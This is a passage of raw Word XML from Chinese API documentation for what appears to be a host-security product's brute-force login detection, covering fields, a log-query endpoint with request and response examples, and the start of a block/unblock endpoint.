      <w:tr w:rsidR="00BC669E" w14:paraId="4607F734" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B402F8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serviceType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586CD4E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62301029" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E8CCDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">服务类型， Linux: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>1:SSHD</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2:VSFTPD Windows: 100:RDP </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>101:WINRM 102:SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="452D34BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA35338" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>clientIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26BC5034" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215DB1F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2280E065" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击来源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="552E8B85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724D43BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="192CF7B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D27EEBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFE9889" w14:textId="6C301CBA" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停状态，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "暴力破解封停状态" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>封</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>停状态</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="398401E8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75AB5FA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A8190EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A1359A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E92318F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务类型名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1849FBA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="_Toc115166210"/>
      <w:bookmarkStart w:id="272" w:name="查询记录"/>
      <w:bookmarkEnd w:id="270"/>
      <w:r>
        <w:t>查询记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p w14:paraId="6947C507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows暴力破解上报事件记录的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E8074" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21728CA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutecrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289AF97"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899"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="36073D6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722148D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="317B3B8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA80090" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2A6F93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D44BCFD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ECAB06B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crackId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50DECE37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E99E98D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A18A55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击ID（查询结果接口返回的id字段）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01131526" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F012F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/brutecrack/linux/log?page=0&amp;size=50&amp;crackId=tFU7aUo3o5w7GDPlJqQfMA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D52A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D78E4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1531392352,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "reason": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "status": -10,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "block": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blockDuration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667B196E"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556"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="009C452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B8B7BA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5113CF0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFAD23A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="545FF73A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23137242" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06160E9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="173B52EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59E88A9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491AC564" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>攻击时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B6EB9F7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C131B27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44058474" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B73574" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698A586A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录失败原因，1：用户名不存在</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="560A3195" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E1224D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14EDE1A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04F5A86C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F4ADCEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A7BB799" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="601D17E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="572A5BD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F125B64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E48D0B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D5A6F48" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573F4E7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B2C616" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F660812" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5850585B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停状态，见《封停状态字典表》</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C517BF4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316BD6ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blockDuration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11211DAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7BB4E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD72FCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停时间，单位秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D0D071E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="_Toc115166211"/>
      <w:bookmarkStart w:id="274" w:name="封停解封操作"/>
      <w:bookmarkEnd w:id="272"/>
      <w:r>
        <w:t>封停/解封操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w14:paraId="77D7150A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows暴力破解封停/解封操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F0650" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1F146" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutecrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
